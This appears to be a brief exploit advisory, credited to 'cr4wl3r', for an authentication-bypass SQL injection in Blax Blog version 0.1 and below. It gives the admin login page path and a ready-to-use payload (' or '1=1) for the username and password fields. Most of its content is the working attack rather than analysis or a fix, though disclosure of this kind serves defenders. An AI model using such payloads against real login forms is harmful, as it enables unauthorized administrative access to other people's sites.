Blax Blog versions 0.1 and below suffer from a remote SQL injection vulnerability that allows for authentication bypass.
224ac54fd4a4daf8bcf7d974783b286b# Blax Blog <= 0.1 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://www.proje3x.com/indir/blax.rar
# PoC: [path]/admin/girisyap.php
# Username: ' or '1=1
# password: ' or '1=1
Comments
No comments yet, be the first!